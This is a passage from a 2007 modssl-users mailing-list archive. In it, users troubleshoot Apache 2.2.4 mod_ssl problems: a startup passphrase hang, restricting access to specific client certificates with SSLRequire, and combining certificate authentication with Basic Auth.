>> than http?
>> 
>> 
>> 
>> # Secure (SSL/TLS) connections
>> #Include conf/extra/httpd-ssl.conf
>> #
>> # Note: The following must must be present to support
>> #       starting without SSL on platforms with no /dev/random equivalent
>> #       but a statically compiled-in mod_ssl.
>> #
>> 
>> SSLRandomSeed startup builtin
>> SSLRandomSeed connect builtin
>> 
>> 
>> 
>> With above commented out, when I try to start apache, I get following
>> passphrase prompt and apache does not start even after saying passphrase
>> successful, no logs in logs directory although log level is "debug"
>> 
>> ]# ./apachectl start
>> httpd: Could not reliably determine the server's fully qualified domain
>> name, using 10.3.110.109 for ServerName
>> Apache/2.2.4 mod_ssl/2.2.4 (Pass Phrase Dialog)
>> Some of your private key files are encrypted for security reasons.
>> In order to read them you have to provide the pass phrases.
>> 
>> Server 10.3.110.109:443 (RSA)
>> Enter pass phrase:
>> 
>> OK: Pass Phrase Dialog successful.
>> [root@rh4_109 bin]#
>> 
>> Thanks you very much for your help.
>> 
>> 
>> -----Original Message-----
>> From: owner-modssl-users@modssl.org
>> [mailto:owner-modssl-users@modssl.org] On Behalf Of Omar W. Hannet
>> Sent: Monday, June 18, 2007 8:34 AM
>> To: modssl-users@modssl.org
>> Subject: Re: Apache with mod_ssl
>> 
>> Do you have  tags surrounding all
>> SSL directives in your configuration file?  For example:
>> 
>> 
>> SSLPassPhraseDialog  builtin
>> # etc.
>> 
>> 
>> Saikat Saha wrote:_module>
>>> Apache was compiled as below
>>> 
>>> ./configure --with-ldap --enable-mods-shared="all ssl ldap cache proxy
>>> authn_alias mem_cache file_cache authnz_ldap charset_lite dav_lock
>>> disk_cache" --prefix=/opt/apache-2.2.4
>>> 
>>> Httpd -l gives below
>>> [root@rh4_109 bin]# httpd -l
>>> Compiled in modules:
>>>   core.c
>>>   prefork.c
>>>   http_core.c
>>>   mod_so.c
>>> 
>>> How do I compile so that it does not load mod_ssl automatically and
>>> loads only if httpd.conf is configured.
>>> 
>>> Surprisingly there are no error logs even at debug level.
>>> 
>>> Thank you so very much for the kind help.
>>> 
>>> -----Original Message-----
>>> From: owner-modssl-users@modssl.org
>>> [mailto:owner-modssl-users@modssl.org] On Behalf Of Omar W. Hannet
>>> Sent: Friday, June 15, 2007 4:13 PM
>>> To: modssl-users@modssl.org
>>> Subject: Re: Apache with mod_ssl
>>> 
>>> Saikat Saha wrote:
>>>> We have apache 2.2.4 compiled with all modules but commented out all load 
>>>> modules. Do not have anything in httpd.conf file to state that
>>> this 
>>>> is https. But when I start apache, it tries to goto https and prompts
>> 
>>>> for pass phrase. How does apache determine that this is https whereas
>> 
>>>> this is actually a http server.
>>> Perhaps mod_ssl is a compiled-in module.  Run 'httpd -l' to check
>> this.
>>>> After I enter a passphrase, it shows successful but the server never 
>>>> starts up. Can someone please help?
>>> The reason probably can be found in Apache's error_log file.
>>> 
>>>> Also can apache support both http and https at different ports at the
>> 
>>>> same time?
>>> Yes.  The defaults are port 80 for http and port 443 for https.
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

- -- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         admin & senior security consultant:  sysinfo.com
                         http://sysinfo.com
Key fingerprint = 9401 4B13 B918 164C 647A  E838 B2DF AFCC 94B0 6629

...We waste time looking for the perfect lover
instead of creating the perfect love.

                 -Tom Robbins 
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iD8DBQFGer+zst+vzJSwZikRAlhnAJ4rLby4nNIlTNYwr0Vq2bQdI1TGmwCgwn1e
itrUfe7Vl+cuoIdY3KOVw8M=
=LeZD
-----END PGP SIGNATURE-----
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 25 16:42:22 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id BE3D014D8AD; Wed, 25 Jul 2007 16:42:22 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smoker.itak.sztaki.hu (smoker.itak.sztaki.hu [195.111.0.10])
	by master.modssl.org (Postfix) with ESMTP id 3693B14D82F
	for ; Wed, 25 Jul 2007 16:42:19 +0200 (CEST)
Received: from smoker.itak.sztaki.hu (smoker [127.0.0.1])
	by smoker.itak.sztaki.hu (8.13.8/8.13.8) with ESMTP id l6PEgFal017211
	for ; Wed, 25 Jul 2007 16:42:15 +0200
Received: from localhost (localhost [[UNIX: localhost]])
	by smoker.itak.sztaki.hu (8.13.8/8.13.8/Submit) id l6PEgFH5017210
	for modssl-users@modssl.org; Wed, 25 Jul 2007 16:42:15 +0200
X-Authentication-Warning: smoker.itak.sztaki.hu: merlin set sender to merlin@sztaki.hu using -f
From: merlin@sztaki.hu
To: modssl-users@modssl.org
Subject: How to accept only certain client certificates
Date: Wed, 25 Jul 2007 16:42:15 +0200
User-Agent: KMail/1.9.5
MIME-Version: 1.0
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Message-Id: <200707251642.15268.merlin@sztaki.hu>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: merlin@sztaki.hu
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Dear all,

I have a working SSL configuration, with client certificate authentication.
The SSLCACertificateFile directive is set so I accept every client who
has a certificate from that CA.

The problem is that since I'm running a web service, not webpages,
I want allow the access for a few clients only.
One way to achieve this to create my own CA and Issue client certificates,=
=20
which I'm doing now.
But my clients have their own certificates issued by eg. Verisign.
Is there a way to allow theese certs while denying the other from the same =
CA?
Can I just somehow directly enumerate the certificates I want to allow,=20
similar to the java truststore concept?

Thank you in advance
Mih=E1ly H=E9der
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 25 16:51:11 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 83C3514D9DB; Wed, 25 Jul 2007 16:51:11 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hq-ipt01.anteon.com (hq-ipt01.anteon.com [198.185.182.20])
	by master.modssl.org (Postfix) with ESMTP id ED53F14D89E
	for ; Wed, 25 Jul 2007 16:51:10 +0200 (CEST)
Received: from hq-exout01.anteon.com ([10.170.1.216])
  by hq-ipt01.anteon.com with ESMTP; 25 Jul 2007 10:51:05 -0400
X-SENDER-IP: 10.170.1.216
X-SENDER-REPUTATION: None
X-IronPort-AV: i="4.16,581,1175486400"; 
   d="scan'208"; a="39628074:sNHT19388992"
Received: from HQ-EXVS02.anteon.com ([10.170.1.143]) by HQ-EXOUT01.anteon.com with Microsoft SMTPSVC(6.0.3790.1830);
	 Wed, 25 Jul 2007 10:51:05 -0400
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: RE: How to accept only certain client certificates
Date: Wed, 25 Jul 2007 10:51:04 -0400
Message-ID: 
In-Reply-To: <200707251642.15268.merlin@sztaki.hu>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: How to accept only certain client certificates
Thread-Index: AcfOyg4O5dGsr2LKTJeR7gviohqBRAAAJkUA
References: <200707251642.15268.merlin@sztaki.hu>
From: "Fought, Richard" 
To: 
X-OriginalArrivalTime: 25 Jul 2007 14:51:05.0537 (UTC) FILETIME=[3A504310:01C7CECB]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Fought, Richard" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users



-----Original Message-----
>From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] >On Behalf Of merlin@sztaki.hu
>Sent: Wednesday, July 25, 2007 9:42 AM
>To: modssl-users@modssl.org
>Subject: How to accept only certain client certificates

>Dear all,

>I have a working SSL configuration, with client certificate
authentication.
>The SSLCACertificateFile directive is set so I accept every client who
>has a certificate from that CA.

>The problem is that since I'm running a web service, not webpages,
>I want allow the access for a few clients only.
>One way to achieve this to create my own CA and Issue client
certificates,=20
>which I'm doing now.
>But my clients have their own certificates issued by eg. Verisign.
>Is there a way to allow theese certs while denying the other from the
same >CA?
>Can I just somehow directly enumerate the certificates I want to allow,

>similar to the java truststore concept?

Perhaps you can use SSLRequire to use certificate parameters for
conditional access.  You should be able to enumerate the desired client
distinguished names.

Rich
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 25 17:15:37 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6982D14D89E; Wed, 25 Jul 2007 17:15:37 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from outbound02.telus.net (outbound02.telus.net [199.185.220.221])
	by master.modssl.org (Postfix) with ESMTP id B87F614D82F
	for ; Wed, 25 Jul 2007 17:15:36 +0200 (CEST)
Received: from priv-edtnaa05.telusplanet.net ([137.186.246.196])
          by priv-edtnes44.telusplanet.net
          (InterMail vM.7.08.02.00 201-2186-121-20061213) with ESMTP
          id <20070725151530.GLOW16090.priv-edtnes44.telusplanet.net@priv-edtnaa05.telusplanet.net>
          for ; Wed, 25 Jul 2007 09:15:30 -0600
Received: from [192.168.2.100] (d137-186-246-196.abhsia.telus.net [137.186.246.196])
	by priv-edtnaa05.telusplanet.net (BorderWare MXtreme Infinity Mail Firewall) with ESMTP id F0GP4SJFHW
	for ; Wed, 25 Jul 2007 09:15:29 -0600 (MDT)
Message-ID: <46A76912.5000203@daltons.ca>
Date: Wed, 25 Jul 2007 09:15:30 -0600
From: Aaron Dalton 
User-Agent: Thunderbird 2.0.0.5 (Windows/20070716)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: SSL + Basic Auth
X-Enigmail-Version: 0.95.2
OpenPGP: id=8811D2A4;
	url=https://biglumber.com/x/web?qs=8811d2a4
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms090909030905070202000605"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Aaron Dalton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a cryptographically signed message in MIME format.

--------------ms090909030905070202000605
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I am trying to setup a RESTful web service where GET is open to all but
POST, PUT, and DELETE are restricted to authorized users.  I have a
database of users that is checked using Basic Auth.  So far, so good.  I
*also* want to make it possible to issue certificates (from a
home-rolled CA) to users if they wish, so they can bypass the
username/password dialogues.  Try as I might, I simply cannot get an
either/or setup working where certs are checked and basic auth is
skipped if a valid cert is found.  No matter what, the Basic Auth dialog
always appears.  It also appears that the  directive does not
work with RequireSSL directives?  Is there a way to limit only certain
methods using SSL?  I've tried +FakeBasicAuth but then the database
lookup code rejects the username (of course).  Here's what my config
looks like right now.  I would really appreciate any pointers or
suggestions.  Thanks so much for your time.

- --BEGIN CONFIG--

	SSLOptions +StdEnvVars
	AllowOverride all
	Order deny,allow
	Allow from all
	Satisfy any

	SSLRequireSSL
	SSLRequire           %{SSL_CIPHER_USEKEYSIZE} >= 128
	SSLRequire ( \
		%{SSL_CLIENT_S_DN_O} eq "Super Duper Games" \
		and %{SSL_CLIENT_S_DN_OU} eq "REST Server" \
	)


	AuthType	Basic
	AuthBasicProvider dbd
	AuthDBDUserPWQuery "SELECT encrypt(password) FROM users WHERE username=%s"
	AuthName	 "Super Duper Games"

	
		Require		valid-user
	

- --END CONFIG--

- --
Aaron Dalton       |   Super Duper Games
aaron@daltons.ca   |   http://superdupergames.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: My Key: http://biglumber.com/x/web?qs=8811d2a4
Comment: My Website: http://superdupergames.org
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAkanaRIACgkQvlYKTYgR0qRbNQCgmgRcKYDpb9YxlDXp8drI397S
HckAoLgiYckfCBAAudqG2FmehACpXq4Q
=LthK
-----END PGP SIGNATURE-----

--------------ms090909030905070202000605
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIISOjCC
BggwggPwoAMCAQICAQEwDQYJKoZIhvcNAQEEBQAweTEQMA4GA1UEChMHUm9vdCBDQTEeMBwG
A1UECxMVaHR0cDovL3d3dy5jYWNlcnQub3JnMSIwIAYDVQQDExlDQSBDZXJ0IFNpZ25pbmcg
QXV0aG9yaXR5MSEwHwYJKoZIhvcNAQkBFhJzdXBwb3J0QGNhY2VydC5vcmcwHhcNMDUxMDE0
MDczNjU1WhcNMzMwMzI4MDczNjU1WjBUMRQwEgYDVQQKEwtDQWNlcnQgSW5jLjEeMBwGA1UE
CxMVaHR0cDovL3d3dy5DQWNlcnQub3JnMRwwGgYDVQQDExNDQWNlcnQgQ2xhc3MgMyBSb290
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAq0k1EUh80iZ+U5TPQ6ndKNdCKovz
h3gZWHwPntqJfeH763KQDXShlmSrn6AkmXPa4lV2xxd79QSsRrjDvn9kjRBsJPNhnMDykPpR
5vVpAWPDD1biSkLP4kSMJSioxXkJfUa5ivPp8zQpCEXkHJ/LlAQcgagUs5hlxEPsToKNCdG9
qluNktDs3pDFfwrC4+vmMVpedD6XM1nowwM9YDO/99FvR8TN7mKDUm4uCJqk2RUYkaaFkkew
rkjrbbch7IUaaHI1q//wEF3A9JSnatU7kn5MkAV+k8Esi6SOYnQVcW4LcQPqrxU4mtTSBXJv
jPkr61pyJfk5RuNyGz4Ew2QnIhAqik9YpwOtvrQuE+1dqkjX1X3UKntc+kYEUOTMDkJbjO3b
8s/8lpPg2xE2VGI0OI8MYJs7l1Y4rfPSW4ugW+pOlrh819WghnBA05Ept6I8rfWMu88akork
NHvA2Gxf6QrCw6cgmlrfLF1SXLpH1ZvvJChwOCAv1X8pwLJBA2iSzOCczJdLRe86EAqrcDqY
lXCtNbHqhSukHIAhMamuYHqAJkgAuAHAk2NVIpE8Vuev2zol848xVOomi4FZ+aHRUxHFe50D
9nQR4G2xLD8shpGZcZqmd4s0YNEUtCysna+MENOfxGr4bxP8c1n3ZkJ0Horj+NzSb5icy0eY
lUAF++kCAwEAAaOBvzCBvDAPBgNVHRMBAf8EBTADAQH/MF0GCCsGAQUFBwEBBFEwTzAjBggr
BgEFBQcwAYYXaHR0cDovL29jc3AuQ0FjZXJ0Lm9yZy8wKAYIKwYBBQUHMAKGHGh0dHA6Ly93
d3cuQ0FjZXJ0Lm9yZy9jYS5jcnQwSgYDVR0gBEMwQTA/BggrBgEEAYGQSjAzMDEGCCsGAQUF
BwIBFiVodHRwOi8vd3d3LkNBY2VydC5vcmcvaW5kZXgucGhwP2lkPTEwMA0GCSqGSIb3DQEB
BAUAA4ICAQB/CIih2hpQSdqJ+6EIcvOK9x7EOrR5WyAwsUXewl3TZWnxwl1UVDyFX7l7QpHC
mf0bUZurRqWhEFOebYisc24sM6bw9J7gdcE+iEWp4WZD/lZa0XpBePdA2ko68QtbpbsWBubC
55O5hU2XT7EeOEOA75sNjO+4p2AAh1d9HkQcyyPvmzyZna+1KRxFeRaWTSdt8Rxsw8JVZLO8
FOLzpB8eMvwnFQXP3S6uPoJhe/AhEBj2ROpTOfnc0Jog4Ma74LtaT8SZyAe9tb2i2y5iDUI0
Qbz/i4r1USKqiDAA4rDUvL5lutUDV3mb6NzITfhQ7ZGlUiiirPs2WD7plCuRUIcb1l7WjMz3
DxAMUk7QFmHl5QpsvxfHckZXnJj1bGBjem9euU4vyLm5u2qFvJgN7fk+l4Q0lK4Ar6Hl55Ju
Tr3z4tkUi1zS6wFsoBelLRDrnHpKvb3uzv3tIkCrcDiI9QqHasKrBWDJSAXaU8HeRHdqs/M8
PO2AvKY4SikkX/5ZO5slelZjAGS5XaRifVc2T62D7x+SU6COd1fd5WERPSMAkEw8+qNgkwSj
rzX2DmqPT0pgp4UFbEahj/THduOhWVf3cbLEbhRcbW1BZt8bk7HUAMPuy888PSGAqV9jZfzd
4F+k9CvwhXFB1Gcl+xqxl67WmYITQdJupRuZJ4DnC6moADCCBhMwggP7oAMCAQICAi6dMA0G
CSqGSIb3DQEBBQUAMFQxFDASBgNVBAoTC0NBY2VydCBJbmMuMR4wHAYDVQQLExVodHRwOi8v
d3d3LkNBY2VydC5vcmcxHDAaBgNVBAMTE0NBY2VydCBDbGFzcyAzIFJvb3QwHhcNMDcwNzAy
MjEyODMzWhcNMDkwNzAxMjEyODMzWjCBzTEaMBgGA1UEAxMRQWFyb24gQ2FyeSBEYWx0b24x
HzAdBgkqhkiG9w0BCQEWEGFhcm9uQGRhbHRvbnMuY2ExHTAbBgkqhkiG9w0BCQEWDmFhcm9u
QGZpbmNoLnN0MSgwJgYJKoZIhvcNAQkBFhlhYXJvbkBzdXBlcmR1cGVyZ2FtZXMub3JnMSAw
HgYJKoZIhvcNAQkBFhFhYXJvbkBmcmVlYnNkLm9yZzEjMCEGCSqGSIb3DQEJARYUYWNkYWx0
b25AdWNhbGdhcnkuY2EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDQJs1d+gGC
+adl2Cy5cI2rJsTz2EIA9ScG4kTkgMqZfhwomnQP7klgw2NuoOeflr7SMYlV0odyq1bvPjU8
0kmdc3mrDFv/lmFshadr+se3SuON5K/GVy+iLFslM8o7a7uKJmInjMNjYyoiSTdLznIop2Rv
QIoC6tOBg+h4ULN1H1UklPfvfi8AiSxz6bpTdCFMNch9ggvsXAXt0fzEb2NINV3J1+lCeIpI
I0ry/8jv9ztZUehvyaq1m7HXtr2BtYNa1AxD+nL94/XgndzgGqs3h/43FmFUNYDvFaBi6VHN
klx0aPLqeu/vNazJFCGPcqYFKUUD21XaC3ynyfoTSanbAgMBAAGjggFzMIIBbzAMBgNVHRMB
Af8EAjAAMFYGCWCGSAGG+EIBDQRJFkdUbyBnZXQgeW91ciBvd24gY2VydGlmaWNhdGUgZm9y
IEZSRUUgaGVhZCBvdmVyIHRvIGh0dHA6Ly93d3cuQ0FjZXJ0Lm9yZzBiBgNVHSUEWzBZBggr
BgEFBQcDBAYIKwYBBQUHAwIGCCsGAQUFBwMDBgorBgEEAYI3AgEVBgorBgEEAYI3AgEWBgor
BgEEAYI3CgMEBgorBgEEAYI3CgMDBglghkgBhvhCBAEwMgYIKwYBBQUHAQEEJjAkMCIGCCsG
AQUFBzABhhZodHRwOi8vb2NzcC5jYWNlcnQub3JnMG8GA1UdEQRoMGaBEGFhcm9uQGRhbHRv
bnMuY2GBDmFhcm9uQGZpbmNoLnN0gRlhYXJvbkBzdXBlcmR1cGVyZ2FtZXMub3JngRFhYXJv
bkBmcmVlYnNkLm9yZ4EUYWNkYWx0b25AdWNhbGdhcnkuY2EwDQYJKoZIhvcNAQEFBQADggIB
AABvuxnNMYpbx0t1gLs0vgCewm7MGk0b3CCj/7FcAJFNY8YHNHFcyfrph3dld29S0U1CvHGm
5J8UzsdHycleszUv8jReVRC+jK3qfa0SJCvu8DLt8YN6nrkQv9yK0FCvb8uaCNovbkESvy3Y
XEAfNBefNkZNd4CN9Qhl4UqzVFSrVSHsVmLXaWhfaDGnAJ44YVYky1OvY6NPCsacPiqkvY9C
0r6sYVcdujmj0Khonwg734MNlGxjLICu6gxduub7Y+qC1QH2fzeCnyYDo9H0uN9M7NhYm2mr
1lIwIahrDvtMfCOeTV2ugocCWDHqCXOfExolS80olkVeqwuY9KwQxe7jHivapmUcSfw2R6qW
MQhE6FLzmOqqxDM3EdRbfRcMs9PgzPUx02lVo/ZNdmvF1a7FcArY8ulQ27Zy2laIyu6lfvVJ
yyH/1EeYNnKhtR0lzfdkaNyF+6SGUzDaGdcYgkH0CNQcJMfIXUcTmaodt07hqO2kppHP3284
zKnACN9k/btC+xgrzQAzzj70oKB25okQ2T8cX9evJDFhgG34G0UJY9/HJURY4Ckl60O7GTsN
VllozZV9E04dKjg9N0OqC0OOvgY4mCmcQpmi0QPnjutZzfxtE0C3dti8xC/fq8qFoxkZmXfn
d+9Y5c0Ql4mOzyU+Vogh8xWfMgaE17K8mk8hMIIGEzCCA/ugAwIBAgICLp0wDQYJKoZIhvcN
AQEFBQAwVDEUMBIGA1UEChMLQ0FjZXJ0IEluYy4xHjAcBgNVBAsTFWh0dHA6Ly93d3cuQ0Fj
ZXJ0Lm9yZzEcMBoGA1UEAxMTQ0FjZXJ0IENsYXNzIDMgUm9vdDAeFw0wNzA3MDIyMTI4MzNa
Fw0wOTA3MDEyMTI4MzNaMIHNMRowGAYDVQQDExFBYXJvbiBDYXJ5IERhbHRvbjEfMB0GCSqG
SIb3DQEJARYQYWFyb25AZGFsdG9ucy5jYTEdMBsGCSqGSIb3DQEJARYOYWFyb25AZmluY2gu
c3QxKDAmBgkqhkiG9w0BCQEWGWFhcm9uQHN1cGVyZHVwZXJnYW1lcy5vcmcxIDAeBgkqhkiG
9w0BCQEWEWFhcm9uQGZyZWVic2Qub3JnMSMwIQYJKoZIhvcNAQkBFhRhY2RhbHRvbkB1Y2Fs
Z2FyeS5jYTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBANAmzV36AYL5p2XYLLlw
jasmxPPYQgD1JwbiROSAypl+HCiadA/uSWDDY26g55+WvtIxiVXSh3KrVu8+NTzSSZ1zeasM
W/+WYWyFp2v6x7dK443kr8ZXL6IsWyUzyjtru4omYieMw2NjKiJJN0vOciinZG9AigLq04GD
6HhQs3UfVSSU9+9+LwCJLHPpulN0IUw1yH2CC+xcBe3R/MRvY0g1XcnX6UJ4ikgjSvL/yO/3
O1lR6G/JqrWbsde2vYG1g1rUDEP6cv3j9eCd3OAaqzeH/jcWYVQ1gO8VoGLpUc2SXHRo8up6
7+81rMkUIY9ypgUpRQPbVdoLfKfJ+hNJqdsCAwEAAaOCAXMwggFvMAwGA1UdEwEB/wQCMAAw
VgYJYIZIAYb4QgENBEkWR1RvIGdldCB5b3VyIG93biBjZXJ0aWZpY2F0ZSBmb3IgRlJFRSBo
ZWFkIG92ZXIgdG8gaHR0cDovL3d3dy5DQWNlcnQub3JnMGIGA1UdJQRbMFkGCCsGAQUFBwME
BggrBgEFBQcDAgYIKwYBBQUHAwMGCisGAQQBgjcCARUGCisGAQQBgjcCARYGCisGAQQBgjcK
AwQGCisGAQQBgjcKAwMGCWCGSAGG+EIEATAyBggrBgEFBQcBAQQmMCQwIgYIKwYBBQUHMAGG
Fmh0dHA6Ly9vY3NwLmNhY2VydC5vcmcwbwYDVR0RBGgwZoEQYWFyb25AZGFsdG9ucy5jYYEO
YWFyb25AZmluY2guc3SBGWFhcm9uQHN1cGVyZHVwZXJnYW1lcy5vcmeBEWFhcm9uQGZyZWVi
c2Qub3JngRRhY2RhbHRvbkB1Y2FsZ2FyeS5jYTANBgkqhkiG9w0BAQUFAAOCAgEAAG+7Gc0x
ilvHS3WAuzS+AJ7CbswaTRvcIKP/sVwAkU1jxgc0cVzJ+umHd2V3b1LRTUK8cabknxTOx0fJ
yV6zNS/yNF5VEL6Mrep9rRIkK+7wMu3xg3qeuRC/3IrQUK9vy5oI2i9uQRK/LdhcQB80F582
Rk13gI31CGXhSrNUVKtVIexWYtdpaF9oMacAnjhhViTLU69jo08Kxpw+KqS9j0LSvqxhVx26
OaPQqGifCDvfgw2UbGMsgK7qDF265vtj6oLVAfZ/N4KfJgOj0fS430zs2FibaavWUjAhqGsO
+0x8I55NXa6ChwJYMeoJc58TGiVLzSiWRV6rC5j0rBDF7uMeK9qmZRxJ/DZHqpYxCEToUvOY
6qrEMzcR1Ft9Fwyz0+DM9THTaVWj9k12a8XVrsVwCtjy6VDbtnLaVojK7qV+9UnLIf/UR5g2
cqG1HSXN92Ro3IX7pIZTMNoZ1xiCQfQI1Bwkx8hdRxOZqh23TuGo7aSmkc/fbzjMqcAI32T9
u0L7GCvNADPOPvSgoHbmiRDZPxxf168kMWGAbfgbRQlj38clRFjgKSXrQ7sZOw1WWWjNlX0T
Th0qOD03Q6oLQ46+BjiYKZxCmaLRA+eO61nN/G0TQLd22LzEL9+ryoWjGRmZd+d371jlzRCX
iY7PJT5WiCHzFZ8yBoTXsryaTyExggMOMIIDCgIBATBaMFQxFDASBgNVBAoTC0NBY2VydCBJ
bmMuMR4wHAYDVQQLExVodHRwOi8vd3d3LkNBY2VydC5vcmcxHDAaBgNVBAMTE0NBY2VydCBD
bGFzcyAzIFJvb3QCAi6dMAkGBSsOAwIaBQCgggGJMBgGCSqGSIb3DQEJAzELBgkqhkiG9w0B
BwEwHAYJKoZIhvcNAQkFMQ8XDTA3MDcyNTE1MTUzMFowIwYJKoZIhvcNAQkEMRYEFEmlmnek
nKUg33Meqp5Bl7W48H+yMFIGCSqGSIb3DQEJDzFFMEMwCgYIKoZIhvcNAwcwDgYIKoZIhvcN
AwICAgCAMA0GCCqGSIb3DQMCAgFAMAcGBSsOAwIHMA0GCCqGSIb3DQMCAgEoMGkGCSsGAQQB
gjcQBDFcMFowVDEUMBIGA1UEChMLQ0FjZXJ0IEluYy4xHjAcBgNVBAsTFWh0dHA6Ly93d3cu
Q0FjZXJ0Lm9yZzEcMBoGA1UEAxMTQ0FjZXJ0IENsYXNzIDMgUm9vdAICLp0wawYLKoZIhvcN
AQkQAgsxXKBaMFQxFDASBgNVBAoTC0NBY2VydCBJbmMuMR4wHAYDVQQLExVodHRwOi8vd3d3
LkNBY2VydC5vcmcxHDAaBgNVBAMTE0NBY2VydCBDbGFzcyAzIFJvb3QCAi6dMA0GCSqGSIb3
DQEBAQUABIIBAGrov5bq0CVb95EultsHOm2fA9yVr/Nar8ZQZ2N3AHk/K6hImImCU/m4lKhL
STFh6Ys6IylsDDnTiSVn1hhPU3mpm6RB/vqqB0iktZ8L5bh5DyvT+Y3PM8a9K6CMz+a4wpuT
M3Fxdr/MBGCLtFWaP2riGJZw4msMzTOUddY5aE6xRCDvusiEs55cDHhFphTPx6nRBXIQBqDN
hgF/OjvXpRRDAo8hv7T2qqEr7k0K3R6tHm5ltqVM7cT6QdOWCPKoGLU3NZCu8c6QtcnaD7lb
2kP8lNvXUgqCjz6ot/ceIWIewnKFwDo3MmKplcHbHcbY6uFcmObLfOu0A0hGyFpBQvcAAAAA
AAA=
--------------ms090909030905070202000605--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug  1 01:24:06 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B0D8B14D87D; Wed,  1 Aug 2007 01:24:06 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web86808.mail.ukl.yahoo.com (web86808.mail.ukl.yahoo.com [217.12.13.50])
	by master.modssl.org (Postfix) with SMTP id B252814D843
	for ; Wed,  1 Aug 2007 01:24:05 +0200 (CEST)
Received: (qmail 25629 invoked by uid 60001); 31 Jul 2007 23:24:00 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.co.uk;
  h=X-YMail-OSG:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID;
  b=eIo2TMV0Z8LEF1za9G1pGH/2bBYIGtG+q1DMB8FAiLs+u/YCx4+2h0h4m1pTvrZtz43lmlf1iHVoM+lTooMIHWxdbgTvf8WizzeT0+rE28H1STxhl4GZUOUKoeTpnPnt6xzjaViXopxd8cbAhH8KZ0BFWSkq5jYpdFseDQAeg64=;
X-YMail-OSG: lu9eNDQVM1kAC25DjQthfKEpBsH_NO3VThz0rO_HXmzZk4ZqLxNShsJt8yvcL6EUgYOYc6Grp.R6S85f3tPk8DgM7HvqgxrQFARmZYy5DuxiL2aUXqViXtecJ1M-
Received: from [81.104.240.100] by web86808.mail.ukl.yahoo.com via HTTP; Wed, 01 Aug 2007 00:23:59 BST
Date: Wed, 1 Aug 2007 00:23:59 +0100 (BST)
From: Glyn Astill 
Subject: Apache and mod_ssl - refusing connections on https?
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Message-ID: <985092.25470.qm@web86808.mail.ukl.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Glyn Astill 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

